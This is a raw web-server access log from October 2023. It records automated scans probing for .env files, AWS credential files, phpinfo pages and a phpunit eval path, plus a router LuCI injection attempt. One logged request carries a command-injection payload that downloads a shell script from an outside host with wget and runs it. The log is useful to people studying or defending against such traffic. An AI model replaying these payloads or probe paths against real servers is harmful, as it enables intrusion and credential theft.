92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /app/config/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /cgi-bin/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /vendor/laravel/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /protected/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /212.91.246.81/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /.remote HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /.local HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /.production HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /lab/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /cron/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /core/app/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /core/Datavase/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /assets/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /sitemaps/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /saas/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /psnlink/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /exapi/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:55 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /tools/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /v1/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /v2/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /administrator/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /gists/cache HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /uploads/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /lib/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /.env.dev HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /blogs/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:56 +0200] "GET /shared/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /.env.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /site/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /sites/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /oss HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /..staging/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /configs/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /v0/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /v3/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:57 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
67.217.57.54 - - [04/Oct/2023:00:32:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
181.214.147.242 - - [04/Oct/2023:00:33:14 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.131.3.46 - - [04/Oct/2023:00:35:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
67.217.57.54 - - [04/Oct/2023:00:35:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.131.3.46 - - [04/Oct/2023:00:36:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
104.131.3.46 - - [04/Oct/2023:00:36:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
109.107.166.15 - - [04/Oct/2023:00:38:04 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:00:38:06 +0200] "\x03" 501 316 "-" "-"
67.217.57.54 - - [04/Oct/2023:00:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.107.166.15 - - [04/Oct/2023:00:39:43 +0200] "\x03" 501 316 "-" "-"
67.217.57.54 - - [04/Oct/2023:00:42:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.76.51.191 - - [04/Oct/2023:00:43:23 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 329 "-" "-"
80.76.51.191 - - [04/Oct/2023:00:43:24 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 329 "-" "-"
200.223.25.126 - - [04/Oct/2023:00:45:01 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
84.54.51.12 - - [04/Oct/2023:00:47:14 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
84.54.51.12 - - [04/Oct/2023:00:47:33 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
35.187.98.121 - - [04/Oct/2023:00:48:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
67.217.57.54 - - [04/Oct/2023:00:49:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.126.186.59 - - [04/Oct/2023:00:51:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
84.54.51.12 - - [04/Oct/2023:00:51:53 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
167.94.145.56 - - [04/Oct/2023:00:54:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.56 - - [04/Oct/2023:00:54:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.56 - - [04/Oct/2023:00:54:39 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.56 - - [04/Oct/2023:00:54:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
84.54.51.12 - - [04/Oct/2023:00:58:10 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
104.199.31.214 - - [04/Oct/2023:00:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.140.248.32 - - [04/Oct/2023:00:59:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
67.217.57.54 - - [04/Oct/2023:00:59:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.88 - - [04/Oct/2023:01:04:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
67.217.57.54 - - [04/Oct/2023:01:06:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.163.130 - - [04/Oct/2023:01:07:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
67.217.57.54 - - [04/Oct/2023:01:08:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.163.130 - - [04/Oct/2023:01:18:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.130 - - [04/Oct/2023:01:19:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.150.186 - - [04/Oct/2023:01:22:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
27.102.81.240 - - [04/Oct/2023:01:28:00 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
179.43.163.130 - - [04/Oct/2023:01:33:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
27.102.81.240 - - [04/Oct/2023:01:33:37 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
27.102.81.240 - - [04/Oct/2023:01:43:00 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
35.203.210.30 - - [04/Oct/2023:01:43:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.94.145.55 - - [04/Oct/2023:01:48:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.55 - - [04/Oct/2023:01:48:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.55 - - [04/Oct/2023:01:48:31 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.55 - - [04/Oct/2023:01:48:31 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
27.102.81.240 - - [04/Oct/2023:01:51:46 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
209.159.153.74 - - [04/Oct/2023:01:52:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:01:53:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:01:56:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
27.102.81.240 - - [04/Oct/2023:01:56:16 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
209.159.153.74 - - [04/Oct/2023:01:59:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:02:04:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:02:05:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
27.102.81.240 - - [04/Oct/2023:02:06:05 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
193.35.18.89 - - [04/Oct/2023:02:08:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
209.159.153.74 - - [04/Oct/2023:02:09:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:02:10:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
27.102.81.240 - - [04/Oct/2023:02:10:40 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
209.159.153.74 - - [04/Oct/2023:02:11:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.159.153.74 - - [04/Oct/2023:02:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.236.176.133 - - [04/Oct/2023:02:18:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
67.217.57.54 - - [04/Oct/2023:02:19:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
27.102.81.240 - - [04/Oct/2023:02:20:09 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
27.102.81.240 - - [04/Oct/2023:02:23:09 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
67.217.57.54 - - [04/Oct/2023:02:26:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
